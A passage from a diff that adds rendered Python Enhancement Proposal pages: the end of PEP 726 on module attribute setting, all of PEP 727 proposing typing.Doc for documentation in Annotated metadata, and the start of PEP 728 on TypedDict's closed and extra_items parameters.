or to prevent deletion of critical sys attributes, the possibility of which makes code more complicated. For example, code using sys.stderr has to check whether the attribute exists and whether it is not None. Currently, it’s possible to remove any sys attribute, including functions:

+
>>> import sys
+>>> del sys.excepthook
+>>> 1+  # notice the next line
+sys.excepthook is missing
+ File "<stdin>", line 1
+   1+
+    ^
+SyntaxError: invalid syntax
+
+
+

See related issue for +other details.

+

Other stdlib modules also come with attributes which can be overridden (as a +feature) and some input validation here could be helpful. Examples: +threading.excepthook, warnings.showwarning, +io.DEFAULT_BUFFER_SIZE or os.SEEK_SET.
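
For example, a sketch of such input validation for a module-level setting, in the style of this PEP's proposal (the module and attribute below are invented for illustration):

# config.py

DEFAULT_BUFFER_SIZE = 8192

def __setattr__(name, value):
    if name == 'DEFAULT_BUFFER_SIZE':
        if not isinstance(value, int) or value <= 0:
            raise ValueError('Positive integer expected')
    globals()[name] = value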

+

Also a typical use case for customizing module attribute access is managing deprecation warnings. But PEP 562 accomplishes this scenario only partially: e.g. it’s impossible to issue a warning during an attempt to change a renamed attribute.

+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0726.rst

+

Last modified: 2024-02-28 23:47:57 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0727/index.html b/pep-0727/index.html new file mode 100644 index 00000000000..0598d6966e5 --- /dev/null +++ b/pep-0727/index.html @@ -0,0 +1,813 @@ + + + + + + + + PEP 727 – Documentation in Annotated Metadata | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 727 – Documentation in Annotated Metadata

+
+
Author:
+
Sebastián Ramírez <tiangolo at gmail.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
28-Aug-2023
+
Python-Version:
+
3.13
+
Post-History:
+
30-Aug-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a standardized way to provide documentation strings for Python +symbols defined with Annotated using a new class +typing.Doc.

+
+
+

Motivation

+

There’s already a well-defined way to provide documentation for classes, +functions, class methods, and modules: using docstrings.

+

Currently there is no formalized standard to provide documentation strings for other +types of symbols: parameters, return values, class-scoped variables (class variables +and instance variables), local variables, and type aliases.

+

Nevertheless, to allow documenting most of these additional symbols, several +conventions have been created as microsyntaxes inside of docstrings, and are +currently commonly used: Sphinx, numpydoc, Google, Keras, etc.

+

There are two scenarios in which these conventions would be supported by tools: for +authors, while editing the contents of the documentation strings and for users, +while rendering that content in some way (in documentation sites, tooltips +in editors, etc).

+

Because each of these conventions uses a microsyntax inside a string, when +editing those docstrings, editors can’t easily provide support for autocompletion, +inline errors for broken syntax, etc. Any type of editing support for these +conventions would be on top of the support for editing standard Python syntax.

+

When documenting parameters with current conventions, the docstring lives in a different place in the code than the actual parameters and requires duplicating information (the parameter name). As a result, the information about a parameter can easily end up far away from, and disconnected from, the declaration of the actual parameter. This means it’s easy to refactor a function, remove a parameter, and forget to remove its docs. The same happens when adding a new parameter: it’s easy to forget to add the docstring for it.

+

And because of this same duplication of information (the parameter name) editors and +other tools need complex custom logic to check or ensure the consistency of the +parameters in the signature and in their docstring, or they simply don’t +fully support that.

+

As these existing conventions are different types of microsyntaxes inside of +strings, robustly parsing them for rendering requires complex logic that +needs to be implemented by the tools supporting them. Additionally, libraries +and tools don’t have a straightforward way to obtain the documentation for +each individual parameter or variable at runtime, without depending on a +specific docstring convention parser. Accessing the parameter documentation +strings at runtime would be useful, for example, for testing the contents +of each parameter’s documentation, to ensure consistency across several +similar functions, or to extract and expose that same parameter +documentation in some other way (e.g. an API with FastAPI, a CLI with Typer, etc).

+

Some of these previous formats tried to account for the lack of type annotations +in older Python versions by including typing information in the docstrings (e.g. +Sphinx, +numpydoc) +but now that information doesn’t need to be in docstrings as there is now an official +syntax for type annotations.

+
+
+

Rationale

+

This proposal intends to address these shortcomings by extending and complementing the +information in docstrings, keeping backwards compatibility with existing docstrings +(it doesn’t deprecate them), and doing it in a way that leverages the Python +language and structure, via type annotations with Annotated, and +a new class Doc in typing.

+

This would belong in the standard Python library instead of an +external package because, although the implementation would be quite trivial, +the actual power and benefit would come from being a standard: facilitating +its usage by library authors and providing a default way to document Python +symbols using Annotated. Some tool providers (at least VS Code +and PyCharm) have shown they would consider implementing support for this only if +it were a standard.

+

This doesn’t deprecate current usage of docstrings; docstrings should be considered +the preferred documentation method when available (they are not available for type +aliases, parameters, etc.). +Docstrings would be complemented by this proposal for documentation specific to +the symbols that can be declared with Annotated +(currently only covered by the several available microsyntax conventions).

+

This should be relatively transparent to common developers (library users) unless +they manually open the source files from libraries adopting it.

+

It should be considered opt-in for library authors who would like to adopt it and +they should be free to decide to use it or not.

+

It would only be useful for libraries that are willing to use optional type hints.

+
+

Summary

+

Here’s a short summary of the features of this proposal in contrast to current +conventions:

+
    +
  • Editing would already be fully supported by default by any editor (current +or future) that supports Python syntax, including syntax errors, syntax +highlighting, etc.
  • +
  • Rendering would be relatively straightforward to implement by static tools +(tools that don’t need runtime execution), as the information can be extracted +from the AST they normally already create.
  • +
  • Deduplication of information: the name of a parameter would be defined in a single +place, not duplicated inside of a docstring.
  • +
  • Elimination of the possibility of having inconsistencies when removing a parameter +or class variable and forgetting to remove its documentation.
  • +
  • Minimization of the probability of adding a new parameter or class variable +and forgetting to add its documentation.
  • +
  • Elimination of the possibility of having inconsistencies between the name of a +parameter in the signature and the name in the docstring when it is renamed.
  • +
  • Access to the documentation string for each symbol at runtime, including existing +(older) Python versions.
  • +
  • A more formalized way to document other symbols, like type aliases, that could +use Annotated.
  • +
  • No microsyntax to learn for newcomers; it’s just Python syntax.
  • +
  • Parameter documentation inheritance for functions captured +by ParamSpec.
  • +
+
+
+
+

Specification

+

The main proposal is to introduce a new class, typing.Doc. +This class should only be used within Annotated annotations. +It takes a single positional-only string argument. It should be used to +document the intended meaning and use of the symbol declared using +Annotated.

+

For example:

+
from typing import Annotated, Doc
+
+class User:
+    name: Annotated[str, Doc("The user's name")]
+    age: Annotated[int, Doc("The user's age")]
+
+    ...
+
+
+

Annotated is normally used as a type annotation; in those cases, +any typing.Doc inside of it documents the symbol being annotated.

+

When Annotated is used to declare a type alias, typing.Doc +would then document the type alias symbol.

+

For example:

+
from typing import Annotated, Doc, TypeAlias
+
+from external_library import UserResolver
+
+CurrentUser: TypeAlias = Annotated[str, Doc("The current system user"), UserResolver()]
+
+def create_user(name: Annotated[str, Doc("The user's name")]): ...
+
+def delete_user(name: Annotated[str, Doc("The user to delete")]): ...
+
+
+

In this case, if a user imported CurrentUser, tools like editors could provide +a tooltip with the documentation string when a user hovers over that symbol, or +documentation tools could include the type alias with its documentation in their +generated output.

+

For tools extracting the information at runtime, they would normally use +get_type_hints() with the parameter include_extras=True, +and as Annotated is normalized (even with type aliases), this +means they should use the last typing.Doc available if more than one is +present, as the last one takes precedence.

+

At runtime, typing.Doc instances have an attribute documentation with the +string passed to it.

+
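+
+As a minimal sketch of how a tool might read this at runtime (assuming Doc is imported from typing_extensions, where it is already implemented, as noted in the Reference Implementation below):
+
+from typing import Annotated, get_type_hints
+from typing_extensions import Doc
+
+def create_user(name: Annotated[str, Doc("The user's name")]) -> None: ...
+
+hints = get_type_hints(create_user, include_extras=True)
+# Annotated metadata is exposed through __metadata__
+docs = [m for m in hints["name"].__metadata__ if isinstance(m, Doc)]
+print(docs[-1].documentation)  # "The user's name"; the last Doc wins if several are present
+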

When a function’s signature is captured by a ParamSpec, +any documentation strings associated with the parameters should be retained.

+

Any tool processing typing.Doc objects should interpret the string as +a docstring, and therefore should normalize whitespace +as if inspect.cleandoc() were used.

+
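+
+For illustration, this is the kind of whitespace normalization inspect.cleandoc() performs:
+
+import inspect
+
+raw = """
+    Summary line.
+
+        Indented detail keeps its relative indentation.
+    """
+print(inspect.cleandoc(raw))
+# Summary line.
+#
+#     Indented detail keeps its relative indentation.
+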

The string passed to typing.Doc should be of a form that would be a +valid docstring. +This means that f-strings and string operations should not be used. +As this cannot be enforced by the Python runtime, +tools should not rely on it.

+
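+
+For example, a dynamically built string is discouraged, while a plain literal is fine (a sketch, with Doc assumed importable as above):
+
+from typing import Annotated
+from typing_extensions import Doc
+
+version = "2.0"
+
+def bad(x: Annotated[str, Doc(f"Added in {version}")]) -> None: ...   # discouraged: f-string
+def good(x: Annotated[str, Doc("Added in version 2.0")]) -> None: ...  # OK: plain literal
+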

When tools providing rendering show the raw signature, they could allow +configuring whether the whole raw Annotated code should be displayed, +but they should default to not including Annotated and its +internal metadata, showing only the types of the annotated symbols. When those tools +support typing.Doc and render in other ways than just a raw signature, +they should show the string value passed to typing.Doc in a convenient way that +makes the relation between the documented symbol and the documentation string clear.

+

Tools providing rendering could allow ways to configure where to show the +parameter documentation and the prose docstring. Otherwise, they +could simply show the prose docstring first, followed by the parameter documentation.

+
+

Examples

+

Class attributes may be documented:

+
from typing import Annotated, Doc
+
+class User:
+    name: Annotated[str, Doc("The user's name")]
+    age: Annotated[int, Doc("The user's age")]
+
+    ...
+
+
+

As can function or method parameters and return values:

+
from typing import Annotated, Doc
+
+def create_user(
+    name: Annotated[str, Doc("The user's name")],
+    age: Annotated[int, Doc("The user's age")],
+    cursor: DatabaseConnection | None = None,
+) -> Annotated[User, Doc("The created user after saving in the database")]:
+    """Create a new user in the system.
+
+    It needs the database connection to be already initialized.
+    """
+    pass
+
+
+
+
+
+

Backwards Compatibility

+

This proposal is fully backwards compatible with existing code and it doesn’t +deprecate existing usage of docstring conventions.

+

For developers that wish to adopt it before it is available in the standard library, +or to support older versions of Python, they can use typing_extensions and +import and use Doc from there.

+

For example:

+
from typing import Annotated
+from typing_extensions import Doc
+
+class User:
+    name: Annotated[str, Doc("The user's name")]
+    age: Annotated[int, Doc("The user's age")]
+
+    ...
+
+
+
+
+

Security Implications

+

There are no known security implications.

+
+
+

How to Teach This

+

The main mechanism of documentation should continue to be standard docstrings for +prose information; this applies to modules, classes, functions, and methods.

+

For authors that want to adopt this proposal to add more granularity, they can use +typing.Doc inside of Annotated annotations for the symbols +that support it.

+

Library authors that wish to adopt this proposal while keeping backwards compatibility +with older versions of Python should use typing_extensions.Doc instead of +typing.Doc.

+
+
+

Reference Implementation

+

typing.Doc is implemented equivalently to:

+
class Doc:
+    def __init__(self, documentation: str, /):
+        self.documentation = documentation
+
+
+

It has been implemented in the typing_extensions package.

+
+
+

Survey of Other Languages

+

Here’s a short survey of how other languages document their symbols.

+
+

Java

+

Java functions and their parameters are documented with +Javadoc, +a special format for comments put on top of the function definition. This is +similar to Python’s current docstring microsyntax conventions (but with a single +convention).

+

For example:

+
/**
+* Returns an Image object that can then be painted on the screen.
+* The url argument must specify an absolute <a href="#{@link}">{@link URL}</a>. The name
+* argument is a specifier that is relative to the url argument.
+* <p>
+* This method always returns immediately, whether or not the
+* image exists. When this applet attempts to draw the image on
+* the screen, the data will be loaded. The graphics primitives
+* that draw the image will incrementally paint on the screen.
+*
+* @param  url  an absolute URL giving the base location of the image
+* @param  name the location of the image, relative to the url argument
+* @return      the image at the specified URL
+* @see         Image
+*/
+public Image getImage(URL url, String name) {
+  try {
+    return getImage(new URL(url, name));
+  } catch (MalformedURLException e) {
+    return null;
+  }
+}
+
+
+
+
+

JavaScript

+

Both JavaScript and TypeScript use a similar system to Javadoc.

+

JavaScript uses JSDoc.

+

For example:

+
/**
+* Represents a book.
+* @constructor
+* @param {string} title - The title of the book.
+* @param {string} author - The author of the book.
+*/
+function Book(title, author) {
+}
+
+
+
+
+

TypeScript

+

TypeScript has +its own JSDoc reference +with some variations.

+

For example:

+
// Parameters may be declared in a variety of syntactic forms
+/**
+* @param {string}  p1 - A string param.
+* @param {string=} p2 - An optional param (Google Closure syntax)
+* @param {string} [p3] - Another optional param (JSDoc syntax).
+* @param {string} [p4="test"] - An optional param with a default value
+* @returns {string} This is the result
+*/
+function stringsStringStrings(p1, p2, p3, p4) {
+    // TODO
+}
+
+
+
+
+

Rust

+

Rust uses another similar variation of a microsyntax in +Doc comments.

+

But it doesn’t have a particularly well-defined microsyntax structure to denote which +documentation refers to which symbol/parameter, other than what can be inferred from +the plain Markdown.

+

For example:

+
#![crate_name = "doc"]
+
+/// A human being is represented here
+pub struct Person {
+   /// A person must have a name, no matter how much Juliet may hate it
+   name: String,
+}
+
+impl Person {
+   /// Returns a person with the name given them
+   ///
+   /// # Arguments
+   ///
+   /// * `name` - A string slice that holds the name of the person
+   ///
+   /// # Examples
+   ///
+   /// ```
+   /// // You can have rust code between fences inside the comments
+   /// // If you pass --test to `rustdoc`, it will even test it for you!
+   /// use doc::Person;
+   /// let person = Person::new("name");
+   /// ```
+   pub fn new(name: &str) -> Person {
+      Person {
+            name: name.to_string(),
+      }
+   }
+
+   /// Gives a friendly hello!
+   ///
+   /// Says "Hello, [name](Person::name)" to the `Person` it is called on.
+   pub fn hello(& self) {
+      println!("Hello, {}!", self.name);
+   }
+}
+
+fn main() {
+   let john = Person::new("John");
+
+   john.hello();
+}
+
+
+
+
+

Go

+

Go also uses a form of Doc Comments.

+

It doesn’t have a well-defined microsyntax structure to denote what documentation +refers to which symbol/parameter, but parameters can be referenced by name without +any special syntax or marker. This also means that ordinary words that could appear +in the documentation text should be avoided as parameter names.

+
package strconv
+
+// Quote returns a double-quoted Go string literal representing s.
+// The returned string uses Go escape sequences (\t, \n, \xFF, \u0100)
+// for control characters and non-printable characters as defined by IsPrint.
+func Quote(s string) string {
+   ...
+}
+
+
+
+
+
+

Rejected Ideas

+
+

Standardize Current Docstrings

+

A possible alternative would be to support, and try to push as a standard, one of the +existing docstring formats. But that would only solve the standardization problem.

+

It wouldn’t solve any of the other problems derived from using a microsyntax inside +of a docstring instead of pure Python syntax, the same as described above in +the Rationale - Summary.

+
+
+

Extra Metadata and Decorator

+

Some ideas before this proposal included having a function doc() instead of +the single class Doc, with several parameters to indicate things such as whether +an object is discouraged from use and what exceptions it may raise. +To also allow deprecating functions and classes, it was expected +that doc() could be used as a decorator. But this functionality is covered +by typing.deprecated() in PEP 702, so it was dropped from this proposal.

+
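+
+A hypothetical sketch of that earlier idea, purely for illustration (the function name, parameters, and attribute below are invented and were never part of any accepted design):
+
+def doc(description: str, *, deprecated: str | None = None,
+        raises: dict[type[BaseException], str] | None = None):
+    def decorator(obj):
+        # attach the metadata somewhere discoverable (illustrative storage only)
+        obj.__doc_info__ = (description, deprecated, raises)
+        return obj
+    return decorator
+
+@doc("Create a user.", deprecated="Use create_user() instead.")
+def make_user(name: str): ...
+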

A way to declare additional information could still be useful in the future, +but taking early feedback on this idea, all that was postponed to future +proposals.

+

This also shifted the focus from an all-encompassing function doc() +with multiple parameters to a single Doc class to be used in +Annotated in a way that could be composed with other +future proposals.

+

This design change also allows better interoperability with other proposals +like typing.deprecated(), as in the future it could be considered to +allow having typing.deprecated() also in Annotated to deprecate +individual parameters, coexisting with Doc.

+
+
+

String Under Definition

+

A proposed alternative in the discussion is declaring a string under the definition +of a symbol and providing runtime access to those values:

+
class User:
+    name: str
+    "The user's name"
+    age: int
+    "The user's age"
+
+    ...
+
+
+

This was already proposed and rejected in PEP 224, mainly due to the ambiguity of +how the string is connected to the symbol it’s documenting.

+

Additionally, there would be no way to provide runtime access to this value in previous +versions of Python.

+
+
+

Plain String in Annotated

+

In the discussion, it was also suggested to use a plain string inside of +Annotated:

+
from typing import Annotated
+
+class User:
+    name: Annotated[str, "The user's name"]
+    age: Annotated[int, "The user's age"]
+
+    ...
+
+
+

But this would give a predefined meaning to any plain string inside of +Annotated, and any existing use of plain strings in it +for other purposes, which is currently allowed, would become invalid.

+

Having an explicit typing.Doc makes it compatible with current valid uses of +Annotated.

+
+
+

Another Annotated-Like Type

+

In the discussion it was suggested to define a new type similar to +Annotated, it would take the type and a parameter with the +documentation string:

+
from typing import Doc
+
+class User:
+    name: Doc[str, "The user's name"]
+    age: Doc[int, "The user's age"]
+
+    ...
+
+
+

This idea was rejected as it would only support that use case and would make it more +difficult to combine it with Annotated for other purposes ( +e.g. with FastAPI metadata, Pydantic fields, etc.) or adding additional metadata +apart from the documentation string (e.g. deprecation).

+
+
+

Transferring Documentation from Type aliases

+

A previous version of this proposal specified that when type aliases declared with +Annotated were used, and these type aliases were used in +annotations, the documentation string would be transferred to the annotated symbol.

+

For example:

+
from typing import Annotated, Doc, TypeAlias
+
+
+UserName: TypeAlias = Annotated[str, Doc("The user's name")]
+
+
+def create_user(name: UserName): ...
+
+def delete_user(name: UserName): ...
+
+
+

This was rejected after receiving feedback from the maintainer of one of the main +components used to provide editor support.

+
+
+

Shorthand with Slices

+

In the discussion, it was suggested to use a shorthand with slices:

+
is_approved: Annotated[str: "The status of a PEP."]
+
+
+

Although this is a very clever idea and would remove the need for a new Doc class, +the runtime in current versions of Python doesn’t allow it.

+

At runtime, Annotated requires at least two arguments, and it +requires the first argument to be a type; it crashes if given a slice.

+
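+
+A quick demonstration of the runtime failure (the exact error message may vary across Python versions):
+
+from typing import Annotated
+
+try:
+    Annotated[str: "The status of a PEP."]  # the colon creates a slice, not a (type, metadata) pair
+except TypeError as exc:
+    print(exc)  # Annotated[...] should be used with at least two arguments
+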
+
+
+

Open Issues

+
+

Verbosity

+

The main argument against this would be the increased verbosity.

+

If the signature were not viewed independently of the documentation, and the body of the +function with the docstring were also measured, the total verbosity would be +somewhat similar, as what this proposal does is move some of the contents +from the docstring in the body to the signature.

+

Considering the signature alone, without the body, signatures could be much longer than +they currently are; they could end up being more than one page long. In exchange, +the equivalent docstrings that are currently more than one page long would become +much shorter.

+

When comparing the total verbosity, including the signature and the docstring, +the main additional verbosity added by this would be from using +Annotated and typing.Doc. If Annotated +had more usage, it could make sense to have an improved shorter syntax for it and for +the type of metadata it would carry. But that would only make sense once +Annotated is more widely used.

+

On the other hand, this verbosity would not affect end users as they would not see the +internal code using typing.Doc. The majority of users would interact with +libraries through editors without looking at the internals, and if anything, they +would have tooltips from editors supporting this proposal.

+

The cost of dealing with the additional verbosity would mainly be carried +by those library maintainers that use this feature.

+

This argument could be analogous to the argument against type annotations +in general, as they do indeed increase verbosity, in exchange for their +features. But again, as with type annotations, this would be optional and only +to be used by those that are willing to take the extra verbosity in exchange +for the benefits.

+

Of course, more advanced users might want to look at the source code of the libraries +and if the authors of those libraries adopted this, those advanced users would end up +having to look at that code with additional signature verbosity instead of docstring +verbosity.

+

Any authors that decide not to adopt it should be free to continue using docstrings +with any particular format they decide, no docstrings at all, etc.

+

Still, there’s a high chance that library authors could receive pressure to +adopt this if it became the blessed solution.

+
+
+

Documentation is not Typing

+

It could also be argued that documentation is not really part of typing, or that +it should live in a different module. Or that this information should not be part +of the signature but live in another place (like the docstring).

+

Nevertheless, type annotations in Python could already be considered, by default, +additional metadata: they carry additional information about variables, +parameters, return types, and by default they don’t have any runtime behavior. And +this proposal would add one more type of metadata to them.

+

It could be argued that this proposal extends the type of information that +type annotations carry, the same way as PEP 702 extends them to include +deprecation information.

+

Annotated was added to the standard library precisely to +support adding additional metadata to the annotations, and as the new proposed +Doc class is tightly coupled to Annotated, it makes +sense for it to live in the same module. If Annotated was moved +to another module, it would make sense to move Doc with it.

+
+
+

Multiple Standards

+

Another argument against this would be that it would create another standard, +and that there are already several conventions for docstrings. It could +seem better to formalize one of the currently existing standards.

+

Nevertheless, as stated above, none of those conventions cover the general +drawbacks of a docstring-based approach that this proposal solves naturally.

+

To see a list of the drawbacks of a docstring-based approach, see the section above +in the Rationale - Summary.

+

In the same way, it can be seen that, in many cases, a new standard that +takes advantage of new features and solves several problems from previous +methods can be worth having, as was the case with the new pyproject.toml, +dataclass_transform, the new typing union (|) operator, and others.

+
+
+

Adoption

+

As this is a new standard proposal, it would only make sense if it had +interest from the community.

+

Fortunately, there’s already interest from several mainstream libraries and +their developers and teams, including FastAPI, Typer, SQLModel, +Asyncer (from the author of this proposal), Pydantic, Strawberry (GraphQL), and +others.

+

There’s also interest and support from documentation tools, like +mkdocstrings, which added +support even for an earlier version of this proposal.

+

All the CPython core developers contacted for early feedback (at least 4) have +shown interest and support for this proposal.

+

Editor developers (VS Code and PyCharm) have shown some interest, along with +concerns about the signature verbosity of the proposal, although not about the +implementation (which is what would affect them the most). They have indicated +they would consider adding support for this if it were to become an +official standard. In that case, they would only need to add support for +rendering; support for editing, which is normally non-existent for +other conventions, is already there, as they already support editing standard +Python syntax.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0727.rst

+

Last modified: 2023-12-11 23:21:54 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0728/index.html b/pep-0728/index.html new file mode 100644 index 00000000000..4d15b08ee1a --- /dev/null +++ b/pep-0728/index.html @@ -0,0 +1,937 @@ + PEP 728 – TypedDict with Typed Extra Items | peps.python.org +
+
+


+ + +
+
+
+

PEP 728 – TypedDict with Typed Extra Items

+
+
Author:
+
Zixuan James Li <p359101898 at gmail.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
12-Sep-2023
+
Python-Version:
+
3.14
+
Post-History:
+
09-Feb-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP adds two class parameters, closed and extra_items, +to type the extra items on a TypedDict. This addresses the +need to define closed TypedDict types or to type a subset of keys that might +appear in a dict while permitting additional items of a specified type.

+
+
+

Motivation

+

A typing.TypedDict type can annotate the value type of each known +item in a dictionary. However, due to structural +assignability, a TypedDict can have extra items +that are not visible through its type. There is currently no way to restrict +the types of items that might be present in the TypedDict type’s +consistent subtypes.

+
+

Disallowing Extra Items Explicitly

+

The current behavior of TypedDict prevents users from defining a +TypedDict type when it is expected that the type contains no extra items.

+

Due to the possible presence of extra items, type checkers cannot infer more +precise return types for .items() and .values() on a TypedDict. This can +also be resolved by +defining a closed TypedDict type.

+

Another possible use case for this is a sound way to +enable type narrowing with the +in check:

+
class Movie(TypedDict):
+    name: str
+    director: str
+
+class Book(TypedDict):
+    name: str
+    author: str
+
+def fun(entry: Movie | Book) -> None:
+    if "author" in entry:
+        reveal_type(entry)  # Revealed type is still 'Movie | Book'
+
+
+

Nothing prevents a dict that is assignable to Movie from having the +author key, and under the current specification it would be incorrect for +the type checker to narrow its type.

+
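+
+Continuing the example above, a minimal sketch of how such a value can arise through a structural subtype (the extra class is illustrative only):
+
+class MovieWithCredits(Movie):  # structurally assignable to Movie
+    author: int  # an extra item, invisible through 'Movie'
+
+record: MovieWithCredits = {"name": "Alien", "director": "Ridley Scott", "author": 42}
+fun(record)  # OK to call, and "author" in record is True,
+             # so narrowing the union to 'Book' (author: str) would be unsound
+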
+
+

Allowing Extra Items of a Certain Type

+

To support API interfaces or legacy codebases where only a subset of the possible +keys is known, it would be useful to explicitly specify extra items of certain +value types.

+

However, the typing spec is more restrictive when checking the construction of a +TypedDict, preventing users +from doing this:

+
class MovieBase(TypedDict):
+    name: str
+
+def foo(movie: MovieBase) -> None:
+    # movie can have extra items that are not visible through MovieBase
+    ...
+
+movie: MovieBase = {"name": "Blade Runner", "year": 1982}  # Not OK
+foo({"name": "Blade Runner", "year": 1982})  # Not OK
+
+
+

While the restriction is enforced when constructing a TypedDict, due to +structural assignability, the +TypedDict may have extra items that are not visible through its type. +For example:

+
class Movie(MovieBase):
+    year: int
+
+movie: Movie = {"name": "Blade Runner", "year": 1982}
+foo(movie)  # OK
+
+
+

It is not possible to acknowledge the existence of the extra items through +in checks and access them without breaking type safety, even though they +might exist in some consistent subtypes of +MovieBase:

+
def bar(movie: MovieBase) -> None:
+    if "year" in movie:
+        reveal_type(movie["year"])  # Error: TypedDict 'MovieBase' has no key 'year'
+
+
+

Some workarounds have already been implemented to allow +extra items, but none of them is ideal. For mypy, +--disable-error-code=typeddict-unknown-key +suppresses type checking errors +specifically for unknown keys on TypedDict. This trades type safety for +flexibility, and it does not offer a way to specify that the TypedDict type +expects additional keys whose value types are assignable to a certain type.

+
+
+

Support Additional Keys for Unpack

+

PEP 692 adds a way to precisely annotate the types of individual keyword +arguments represented by **kwargs using TypedDict with Unpack. However, +because TypedDict cannot be defined to accept arbitrary extra items, it is not +possible to allow additional keyword arguments +that are not known at the time the TypedDict is defined.

+

Given the usage of pre-PEP 692 type annotation for **kwargs in existing +codebases, it will be valuable to accept and type extra items on TypedDict so +that the old typing behavior can be supported in combination with Unpack.

+
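+
+A sketch of what that combination could look like under the semantics proposed below (names are illustrative, and current runtimes may reject the class parameter):
+
+from typing import TypedDict
+from typing_extensions import Unpack
+
+# Pre-PEP 692 style: every keyword argument shares a single value type
+def request_old(**kwargs: str) -> None: ...
+
+# With extra_items, known keys are typed precisely while arbitrary
+# additional keys of type 'str' remain allowed
+class RequestKwargs(TypedDict, extra_items=str):
+    method: str
+
+def request_new(**kwargs: Unpack[RequestKwargs]) -> None: ...
+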
+
+
+

Rationale

+

A type that allows extra items of type str on a TypedDict can be loosely +described as the intersection between the TypedDict and Mapping[str, str].

+

Index Signatures +in TypeScript achieve this:

+
type Foo = {
+    a: string
+    [key: string]: string
+}
+
+
+

This proposal aims to support a similar feature without introducing general +intersection of types or syntax changes, offering a natural extension to the +existing assignability rules.

+

We propose to add a class parameter extra_items to TypedDict. +It accepts a type expression as the argument; when it is present, +extra items are allowed, and their value types must be assignable to that +type expression.

+

An application of this is to disallow extra items. We propose to add a +closed class parameter, which only accepts a literal True or False +as the argument. It should be a runtime error when closed and +extra_items are used at the same time.

+

Different from index signatures, the types of the known items do not need to be +assignable to the extra_items argument.

+

There are some advantages to this approach:

+
    +
  • We can build on top of the assignability rules defined in the typing spec, +where extra_items can be treated as a pseudo-item.
  • +
  • There is no need to introduce a grammar change to specify the type of the +extra items.
  • +
  • We can precisely type the extra items without requiring the value types of the +known items to be assignable to extra_items.
  • +
  • We do not lose backwards compatibility as both extra_items and closed +are opt-in only features.
  • +
+
+
+

Specification

+

This specification is structured to parallel PEP 589 to highlight changes to +the original TypedDict specification.

+

If extra_items is specified, extra items are treated as non-required +items matching the extra_items argument, whose keys are allowed when +determining supported and unsupported operations.

+
+

The extra_items Class Parameter

+

For a TypedDict type that specifies extra_items, during construction, the +value type of each unknown item is expected to be non-required and assignable +to the extra_items argument. For example:

+
class Movie(TypedDict, extra_items=bool):
+    name: str
+
+a: Movie = {"name": "Blade Runner", "novel_adaptation": True}  # OK
+b: Movie = {
+    "name": "Blade Runner",
+    "year": 1982,  # Not OK. 'int' is not assignable to 'bool'
+}
+
+
+

Here, extra_items=bool specifies that items other than 'name' +have a value type of bool and are non-required.

+

The alternative inline syntax is also supported:

+
Movie = TypedDict("Movie", {"name": str}, extra_items=bool)
+
+
+

Accessing extra items is allowed. Type checkers must infer their value type from +the extra_items argument:

+
def f(movie: Movie) -> None:
+    reveal_type(movie["name"])              # Revealed type is 'str'
+    reveal_type(movie["novel_adaptation"])  # Revealed type is 'bool'
+
+
+

extra_items is inherited through subclassing:

+
class MovieBase(TypedDict, extra_items=int | None):
+    name: str
+
+class Movie(MovieBase):
+    year: int
+
+a: Movie = {"name": "Blade Runner", "year": None}  # Not OK. 'None' is incompatible with 'int'
+b: Movie = {
+    "name": "Blade Runner",
+    "year": 1982,
+    "other_extra_key": None,
+}  # OK
+
+
+

Here, 'year' in a is an extra key defined on Movie whose value type +is int. 'other_extra_key' in b is another extra key whose value type +must be assignable to the value of extra_items defined on MovieBase.

+
+
+

The closed Class Parameter

+

When closed=True is set, no extra items are allowed. This is a shorthand for +extra_items=Never, because there can’t be a value type that is assignable to +Never.

+

Similar to total, only a literal True or False is supported as the +value of the closed argument; closed is False by default, which +preserves the previous TypedDict behavior.

+

The value of closed is not inherited through subclassing, but the +implicitly set extra_items=Never is. It should be an error to use the +default closed=False when subclassing a closed TypedDict type:

+
class BaseMovie(TypedDict, closed=True):
+    name: str
+
+class MovieA(BaseMovie):  # Not OK. An explicit 'closed=True' is required
+    pass
+
+class MovieB(BaseMovie, closed=True):  # OK
+    pass
+
+
+

Setting both closed and extra_items when defining a TypedDict type +should always be a runtime error:

+
class Person(TypedDict, closed=False, extra_items=bool):  # Not OK. 'closed' and 'extra_items' are incompatible
+    name: str
+
+
+

As a consequence of closed=True being equivalent to extra_items=Never, +the same rules that apply to extra_items=Never should also apply to +closed=True. It is possible to use closed=True when subclassing if the +extra_items argument is a read-only type:

+
class Movie(TypedDict, extra_items=ReadOnly[str]):
+    pass
+
+class MovieClosed(Movie, closed=True):  # OK
+    pass
+
+class MovieNever(Movie, extra_items=Never):  # Not OK. 'closed=True' is preferred
+    pass
+
+
+

This will be further discussed in +a later section.

+

When neither extra_items nor closed=True is specified, the TypedDict +is assumed to allow non-required extra items of value type ReadOnly[object] +during inheritance or assignability checks. This preserves the existing behavior +of TypedDict.

+
+
+

Interaction with Totality

+

It is an error to use Required[] or NotRequired[] with extra_items. +total=False and total=True have no effect on extra_items itself.

+
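+
+For example (class name illustrative):
+
+class BadMovie(TypedDict, extra_items=NotRequired[int]):  # Not OK. NotRequired[] is rejected here
+    name: str
+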

The extra items are non-required, regardless of the totality of the +TypedDict. Operations +that are available to NotRequired items should also be available to the +extra items:

+
class Movie(TypedDict, extra_items=int):
+    name: str
+
+def f(movie: Movie) -> None:
+    del movie["name"]  # Not OK. The value type of 'name' is 'Required[str]'
+    del movie["year"]  # OK. The value type of 'year' is 'NotRequired[int]'
+
+
+
+
+

Interaction with Unpack

+

For type checking purposes, Unpack[SomeTypedDict] with extra items should be +treated as its equivalent in regular parameters, and the existing rules for +function parameters still apply:
